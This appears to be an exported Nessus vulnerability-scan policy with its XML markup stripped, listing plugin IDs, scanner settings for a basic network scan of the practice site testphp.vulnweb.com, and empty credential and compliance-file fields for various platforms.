134110;133215;147645;148946;151643;134112;155571;135857;136924;138087;140757;139573;142678;144634;142421;155573;144642;156390;144640;146105;147647;157893;148948;151641;154824;156388;158992;34112;56710;97997;104741;111227;105151;137657;143151;88958;64687;24270;24269;88959;64788;100994;24282;55438;55437;45050;45051;43830;48337;72482;73437;51187;24271;45052;61797;71637;71246;72684;40477;155963;52001;44871;51186;85736;102992;70767;56467;24272;88960;104854;104855;105045;108411;104856;104857;59275;88961;65548;88962;91990;51902;34220;135860;24871;25197;34252;42897;144455;42898;144456;55472;70768;52668;59641;88963;24274;137565;24273;11108;21625;52616;63619;38733;18246;11360;18601;18301;24759;125680;106376;42801;72960;51860;51341;106306;51939;106307;106377;56620;106378;59048;60100;72984;62046;64452;69997;67021;73471;77157;79437;83053;83138;83351;85082;85243;85985;87921;88579;91100;91101;91810;93111;93516;96606;96906;97635;100298;104356;103358;105004;106304;111229;109034;125597;119615;125596;122823;128554;129849;132099;136179;137627;142420;149475;148844;155026;153173;159009;156546;105025;30129;63326;25291;73378;62414;73271;64247;19414;105358;32080;18420;76169;62008;79421;123004;74108;18297;81385;11703;30109;15988;105163;64243;105258;64248;64556;65704;79385;64259;63687;15443;73686;72152;29745;69852;141810;62205;62314;51586;65764;76526;76071;40577;76072;40578;24237;118977;133846;140193;151189;101842;140577;139873;136286;136191;136176;136287;151025;139872;133856;118935;140211;101841;64894;64245;140466;72961;59387;105174;97210;34994;59311;47681;80475;63302;105022;105162;24014;76873;76874;24011;66176;76872;105023;105024;100028;84019;64264;90067;110482;66304;80553;64991;63064;35370;123643;92360;69518;105108;77373;101302;101303;126382;82827;66305;83524;83525;64895;85629;105372;64453;14836;16023;33391;20224;24757;20336;60015;11049;15557;18221;52543;38925;40592;58274;19306;51096;10317;55443;11222;19589;20902;11560;11167;14597;12108;40771;40772;65126;40770;14599;14586;14584;14598;11094;14585;15857;33139;44046;11645;20377;57031;57032;14301;11811;11332;58133;17602;14371;10318;11331;12098;14302;10452;10319;14372;11912;19680;42057;34850;26194;11422;22254;11919;11778;51080;12200;11084;24245;18366;31657;71024;11239;10515;12201;11077;11078;11127;11129;11065;11235;10687;10320;11069;11061;10321;10597;40862;40861;40332;40333;81513;81514;81515;81438;29981;21312;22090;25117;18037;81437;33822;18036;19426;20372;44329;20212;10891;14644;14645;14646;14647;35081;144755;92701;93802;94162;112210;95630;96958;96957;96959;96960;99398;97388;99399;100124;102585;103328;102842;104214;103972;103973;103974;103975;103976;103977;103978;103979;103700;104898;105490;104899;105491;105492;105493;107097;105775;106902;107098;107099;109573;109574;109727;111379;111380;111381;112156;112157;112158;112159;119656;119657;118570;119658;119659;119660;119288;134165;122870;122871;145062;122872;122873;122874;122875;122876;122877;135292;130759;125389;130760;132934;131133;131019;134172;134174;134171;132343;132339;134170;132316;134307;132391;136189;135928;149087;149085;144712;138363;144713;149065;149066;149089;144650;144862;144794;141836;140794;144975;141501;144856;144784;141502;144857;149033;144976;149297;144714;145546;142889;144651;149088;144743;144783;144452;149086;146596;148843;152209;152208;154826;156325;11546;74328;74327;78089;18100;32480;70368;18141;18266;132995;18267;18258;18268;18642;18206;19549;20951;21027;22498;25637;23751;29965;33167;34244;33478;35566;38790;40807;44943;44944;47106;51901;70369;70370;70659;70660;72581;87322;87323;87324;86710;87325;87326;87327;127109;20062;48254;42896;26971;11814;11188;11934;47701;10322;47680;13841;21338;44942;10559;17608;11587;12203;11527;87736;25342;42089;54844;12068;55535;59174;58386;59606;62121;66859;69137;71864;11431;30130;18614;24902;32030;18613;31606;14614;25372;24999;42435;35326;21581;11439;15480;24908;25493;20213;35278;11508;29870;30122;11698;11213;31679;11121;11120;10323;10324;10325;12020;66349;29825;10512;14806;15859;17305;14782;11588;30054;16058;11432;11993;30205;58000;25932;24913;25459;23870;25955;25798;25243;19515;18523;18628;14269;34448;18150;15892;18176;18522;20092;20737;34756;10684;31683;50495;66945;70497;56091;71535;91349;91714;72770;100615;102495;104655;70838;158452;35786;62757;35787;100616;43391;44620;105042;22526;15452;34364;19606;16205;11925;62367;20254;22234;43098;22233;39500;131287;39501;49708;34108;22270;22273;53533;58454;58455;29832;49287;63073;58456;11702;11708;18524;36088;16059;51833;16178;17199;29896;10327;11681;45085;35803;72774;142893;142892;127133;142878;72670;72585;72669;14184;72584;117462;21620;117463;14325;10830;14660;48273;14726;119242;21165;140133;139925;135188;158168;25460;10447;10702;10569;11769;118801;11985;11234;10777;19429;17312;24698;40886;73104;72813;148374;148706;78430;96448;15781;17304;10714; + + + + assessment_mode + webapp_known + + + TARGET + testphp.vulnweb.com + + + local_portscan.snmp + yes + + + listen_address + 0.0.0.0 + + + severity_processed + 202203230748 + + + slice_network_addresses + no + + + disable_api + no + + + non_simult_ports + 139, 445, 3389 + + + local_portscan.netstat_ssh + yes + + + ssl_mode + tls_1_2 + + + max_checks + 4 + + + network_scanners.syn + yes + + + stop_scan_on_disconnect + no + + + severity_basis + cvss_v2 + + + report_crashes + yes + + + scan_history_expiration_days + 0 + + + network_scanners.tcp + no + + + disable_guides + no + + + xmlrpc_listen_port + 443 + + + discovery_mode + portscan_common + + + report_cleanup_threshold_days + 30 + + + engine.max_hosts + 16 + + + name + Basic Network Scan + + + whoami + dummy + + + advanced_mode + default + + + scan_description + + + + bw_prevent_agent_scans + yes + + + reverse_lookup + no + + + track_unique_agents + yes + + + optimize_test + yes + + + engine.min + 4 + + + log_whole_attack + no + + + portscan.ping + yes + + + cgi_path + /cgi-bin:/scripts + + + unscanned_closed + no + + + auto_update_ui + yes + + + network_scanners.udp + no + + + auto_update + yes + + + listen_port + 1241 + + + engine.max + 16 + + + local_portscan.netstat_wmi + yes + + + checks_read_timeout + 5 + + + plugins_timeout + 320 + + + auto_enable_dependencies + yes + + + safe_checks + yes + + + report_task_id + 7cee556a-08ae-96c8-d6ec-eecc732e91999febddbb02223ba7 + + + allow_post_scan_editing + yes + + + visibility + private + + + bw_permanent_blackout_window + no + + + wizard_uuid + 731a8e52-3ea6-a291-ec0a-d2ff0619c19d7bd788d6be818b65 + + + scan.unlimited + no + + + max_hosts + 30 + + + engine.max_checks + 64 + + + plugin_upload + yes + + + reduce_connections_on_congestion + no + + + silent_dependencies + yes + + + scan_vulnerability_groups + no + + + feed_type + ProFeed + + + port_range + default + + + scan_vulnerability_groups_mixed + yes + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Controller : + Domain Controller : + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain : + Domain : + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Username : + Domain Username : + entry + + + + + ADSI Settings + 60024 + ADSI Settings[password]:Domain Password : + Domain Password : + password + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Controller 2: + Domain Controller 2: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain 2: + Domain 2: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Username 2: + Domain Username 2: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[password]:Domain Password 2: + Domain Password 2: + password + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Controller 3: + Domain Controller 3: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain 3: + Domain 3: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Username 3: + Domain Username 3: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[password]:Domain Password 3: + Domain Password 3: + password + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Controller 4: + Domain Controller 4: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain 4: + Domain 4: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Username 4: + Domain Username 4: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[password]:Domain Password 4: + Domain Password 4: + password + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Controller 5: + Domain Controller 5: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain 5: + Domain 5: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[entry]:Domain Username 5: + Domain Username 5: + entry + + + + + ADSI Settings + 60024 + ADSI Settings[password]:Domain Password 5: + Domain Password 5: + password + + + + + Adtran AOS Compliance Checks + 71991 + Adtran AOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Adtran AOS Compliance Checks + 71991 + Adtran AOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Adtran AOS Compliance Checks + 71991 + Adtran AOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Adtran AOS Compliance Checks + 71991 + Adtran AOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Adtran AOS Compliance Checks + 71991 + Adtran AOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Adtran AOS Compliance Checks + 71991 + Adtran AOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + AirWatch API Settings + 76460 + AirWatch API Settings[entry]:AirWatch Environment API URL : + AirWatch Environment API URL : + entry + + + + + AirWatch API Settings + 76460 + AirWatch API Settings[entry]:AirWatch port : + AirWatch port : + entry + + + + + AirWatch API Settings + 76460 + AirWatch API Settings[entry]:AirWatch username : + AirWatch username : + entry + + + + + AirWatch API Settings + 76460 + AirWatch API Settings[password]:AirWatch password : + AirWatch password : + password + + + + + AirWatch API Settings + 76460 + AirWatch API Settings[entry]:AirWatch API key : + AirWatch API key : + entry + + + + + AirWatch API Settings + 76460 + AirWatch API Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + AirWatch API Settings + 76460 + AirWatch API Settings[checkbox]:Verify SSL certificate : + Verify SSL certificate : + checkbox + no + no + + + Alcatel TiMOS Compliance Checks + 102730 + Alcatel TiMOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Alcatel TiMOS Compliance Checks + 102730 + Alcatel TiMOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Alcatel TiMOS Compliance Checks + 102730 + Alcatel TiMOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Alcatel TiMOS Compliance Checks + 102730 + Alcatel TiMOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Alcatel TiMOS Compliance Checks + 102730 + Alcatel TiMOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Alcatel TiMOS Compliance Checks + 102730 + Alcatel TiMOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Amazon AWS Compliance Checks + 72426 + Amazon AWS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Amazon AWS Compliance Checks + 72426 + Amazon AWS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Amazon AWS Compliance Checks + 72426 + Amazon AWS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Amazon AWS Compliance Checks + 72426 + Amazon AWS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Amazon AWS Compliance Checks + 72426 + Amazon AWS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Antivirus Software Check + 16193 + Antivirus Software Check[entry]:Delay (in days, between 0 and 7) : + Delay (in days, between 0 and 7) : + entry + 0 + 0 + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[entry]:Apple Profile Manager server : + Apple Profile Manager server : + entry + + + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[entry]:Apple Profile Manager port : + Apple Profile Manager port : + entry + 443 + 443 + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[entry]:Apple Profile Manager username : + Apple Profile Manager username : + entry + + + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[password]:Apple Profile Manager password : + Apple Profile Manager password : + password + + + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[checkbox]:Force Device Updates : + Force Device Updates : + checkbox + yes + yes + + + Apple Profile Manager API Settings + 60032 + Apple Profile Manager API Settings[entry]:Device Update Timeout (Minutes) : + Device Update Timeout (Minutes) : + entry + 5 + 5 + + + Arista EOS Compliance Checks + 92838 + Arista EOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Arista EOS Compliance Checks + 92838 + Arista EOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Arista EOS Compliance Checks + 92838 + Arista EOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Arista EOS Compliance Checks + 92838 + Arista EOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Arista EOS Compliance Checks + 92838 + Arista EOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Arista EOS Compliance Checks + 92838 + Arista EOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + ArubaOS Compliance Checks + 153133 + ArubaOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + ArubaOS Compliance Checks + 153133 + ArubaOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + ArubaOS Compliance Checks + 153133 + ArubaOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + ArubaOS Compliance Checks + 153133 + ArubaOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + ArubaOS Compliance Checks + 153133 + ArubaOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + ArubaOS Compliance Checks + 153133 + ArubaOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region af-south-1 : + Region af-south-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-east-1 : + Region ap-east-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-northeast-1 : + Region ap-northeast-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-northeast-2 : + Region ap-northeast-2 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-northeast-3 : + Region ap-northeast-3 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-south-1 : + Region ap-south-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-southeast-1 : + Region ap-southeast-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ap-southeast-2 : + Region ap-southeast-2 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region ca-central-1 : + Region ca-central-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region cn-north-1 : + Region cn-north-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region cn-northwest-1 : + Region cn-northwest-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region eu-central-1 : + Region eu-central-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region eu-north-1 : + Region eu-north-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region eu-south-1 : + Region eu-south-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region eu-west-1 : + Region eu-west-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region eu-west-2 : + Region eu-west-2 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region eu-west-3 : + Region eu-west-3 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region me-south-1 : + Region me-south-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region sa-east-1 : + Region sa-east-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region us-east-1 : + Region us-east-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region us-east-2 : + Region us-east-2 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region us-gov-east-1 : + Region us-gov-east-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region us-gov-west-1 : + Region us-gov-west-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region us-west-1 : + Region us-west-1 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Region us-west-2 : + Region us-west-2 : + checkbox + no + no + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[password]:AWS Access Key ID : + AWS Access Key ID : + password + + + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[password]:AWS Secret Access Key : + AWS Secret Access Key : + password + + + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + Amazon Web Services Settings + 73490 + Amazon Web Services Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + yes + yes + + + Microsoft Azure Compliance Checks + 79357 + Microsoft Azure Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Microsoft Azure Compliance Checks + 79357 + Microsoft Azure Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Microsoft Azure Compliance Checks + 79357 + Microsoft Azure Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Microsoft Azure Compliance Checks + 79357 + Microsoft Azure Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Microsoft Azure Compliance Checks + 79357 + Microsoft Azure Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Microsoft Azure Settings + 79358 + Microsoft Azure Settings[entry]:Username : + Username : + entry + + + + + Microsoft Azure Settings + 79358 + Microsoft Azure Settings[password]:Password : + Password : + password + + + + + Microsoft Azure Settings + 79358 + Microsoft Azure Settings[entry]:Client ID : + Client ID : + entry + 443 + 443 + + + Microsoft Azure Settings + 79358 + Microsoft Azure Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + Microsoft Azure Settings + 79358 + Microsoft Azure Settings[entry]:Subscriptions : + Subscriptions : + entry + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[entry]:Blackberry UEM Hostname : + Blackberry UEM Hostname : + entry + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[entry]:Blackberry UEM Port : + Blackberry UEM Port : + entry + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[entry]:Blackberry UEM Tenant : + Blackberry UEM Tenant : + entry + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[entry]:Blackberry UEM Domain : + Blackberry UEM Domain : + entry + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[entry]:Blackberry UEM Username : + Blackberry UEM Username : + entry + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[password]:Blackberry UEM Password : + Blackberry UEM Password : + password + + + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[checkbox]:Blackberry UEM SSL : + Blackberry UEM SSL : + checkbox + yes + yes + + + Blackberry UEM Settings + 124860 + Blackberry UEM Settings[checkbox]:Blackberry UEM Verify SSL Certificate : + Blackberry UEM Verify SSL Certificate : + checkbox + no + no + + + BlueCoat ProxySG Compliance Checks + 70470 + BlueCoat ProxySG Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + BlueCoat ProxySG Compliance Checks + 70470 + BlueCoat ProxySG Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + BlueCoat ProxySG Compliance Checks + 70470 + BlueCoat ProxySG Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + BlueCoat ProxySG Compliance Checks + 70470 + BlueCoat ProxySG Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + BlueCoat ProxySG Compliance Checks + 70470 + BlueCoat ProxySG Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + BlueCoat ProxySG Compliance Checks + 70470 + BlueCoat ProxySG Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Brocade FabricOS Compliance Checks + 71842 + Brocade FabricOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Brocade FabricOS Compliance Checks + 71842 + Brocade FabricOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Brocade FabricOS Compliance Checks + 71842 + Brocade FabricOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Brocade FabricOS Compliance Checks + 71842 + Brocade FabricOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Brocade FabricOS Compliance Checks + 71842 + Brocade FabricOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Brocade FabricOS Compliance Checks + 71842 + Brocade FabricOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Check Point GAiA Compliance Checks + 62679 + Check Point GAiA Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Check Point GAiA Compliance Checks + 62679 + Check Point GAiA Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Check Point GAiA Compliance Checks + 62679 + Check Point GAiA Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Check Point GAiA Compliance Checks + 62679 + Check Point GAiA Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Check Point GAiA Compliance Checks + 62679 + Check Point GAiA Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Check Point GAiA Compliance Checks + 62679 + Check Point GAiA Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Cisco ACI Compliance Checks + 137785 + Cisco ACI Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Cisco ACI Compliance Checks + 137785 + Cisco ACI Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Cisco ACI Compliance Checks + 137785 + Cisco ACI Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Cisco ACI Compliance Checks + 137785 + Cisco ACI Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Cisco ACI Compliance Checks + 137785 + Cisco ACI Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Cisco ACI Compliance Checks + 137785 + Cisco ACI Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[radio]:IOS Config File To Audit : + IOS Config File To Audit : + radio + Saved/(show config);Running/(show running);Startup/(show startup) + + Saved/(show config);Running/(show running);Startup/(show startup) + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Cisco IOS Compliance Checks + 46689 + Cisco IOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Cisco Firepower Compliance Checks + 128275 + Cisco Firepower Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Cisco Firepower Compliance Checks + 128275 + Cisco Firepower Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Cisco Firepower Compliance Checks + 128275 + Cisco Firepower Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Cisco Firepower Compliance Checks + 128275 + Cisco Firepower Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Cisco Firepower Compliance Checks + 128275 + Cisco Firepower Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Cisco Firepower Compliance Checks + 128275 + Cisco Firepower Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Citrix NITRO API Settings + 154869 + Citrix NITRO API Settings[entry]:Username + Username + entry + + + + + Citrix NITRO API Settings + 154869 + Citrix NITRO API Settings[password]:Password + Password + password + + + + + Citrix NITRO API Settings + 154869 + Citrix NITRO API Settings[entry]:Port + Port + entry + 443 + 443 + + + Citrix NITRO API Settings + 154869 + Citrix NITRO API Settings[checkbox]:SSL + SSL + checkbox + yes + yes + + + Citrix NITRO API Settings + 154869 + Citrix NITRO API Settings[checkbox]:Verify SSL Certificate + Verify SSL Certificate + checkbox + yes + yes + + + Citrix Application Delivery Compliance Checks + 154868 + Citrix Application Delivery Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Citrix Application Delivery Compliance Checks + 154868 + Citrix Application Delivery Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Citrix Application Delivery Compliance Checks + 154868 + Citrix Application Delivery Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Citrix Application Delivery Compliance Checks + 154868 + Citrix Application Delivery Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Citrix Application Delivery Compliance Checks + 154868 + Citrix Application Delivery Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Citrix XenServer Compliance Checks + 69512 + Citrix XenServer Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Citrix XenServer Compliance Checks + 69512 + Citrix XenServer Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Citrix XenServer Compliance Checks + 69512 + Citrix XenServer Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Citrix XenServer Compliance Checks + 69512 + Citrix XenServer Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Citrix XenServer Compliance Checks + 69512 + Citrix XenServer Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Cleartext protocols settings + 21744 + Cleartext protocols settings[entry]:User name : + User name : + entry + + + + + Cleartext protocols settings + 21744 + Cleartext protocols settings[password]:Password (unsafe!) : + Password (unsafe!) : + password + + + + + Cleartext protocols settings + 21744 + Cleartext protocols settings[checkbox]:Try to perform patch level checks over telnet + + Try to perform patch level checks over telnet + checkbox + no + no + + + Cleartext protocols settings + 21744 + Cleartext protocols settings[checkbox]:Try to perform patch level checks over rsh + + Try to perform patch level checks over rsh + checkbox + no + no + + + Cleartext protocols settings + 21744 + Cleartext protocols settings[checkbox]:Try to perform patch level checks over rexec + + Try to perform patch level checks over rexec + checkbox + no + no + + + Windows Compliance Checks + 21156 + Windows Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Windows Compliance Checks + 21156 + Windows Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Windows Compliance Checks + 21156 + Windows Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Windows Compliance Checks + 21156 + Windows Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Windows Compliance Checks + 21156 + Windows Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Windows File Contents Compliance Checks + 24760 + Windows File Contents Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Windows File Contents Compliance Checks + 24760 + Windows File Contents Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Windows File Contents Compliance Checks + 24760 + Windows File Contents Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Windows File Contents Compliance Checks + 24760 + Windows File Contents Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Windows File Contents Compliance Checks + 24760 + Windows File Contents Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Database Compliance Checks + 33814 + Database Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Database Compliance Checks + 33814 + Database Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Database Compliance Checks + 33814 + Database Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Database Compliance Checks + 33814 + Database Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Database Compliance Checks + 33814 + Database Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Database settings + 33815 + Database settings[radio]:DB Type : + DB Type : + radio + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + + + Database settings + 33815 + Database settings[radio]:Database service type : + Database service type : + radio + SID;SERVICE_NAME + SID;SERVICE_NAME + + 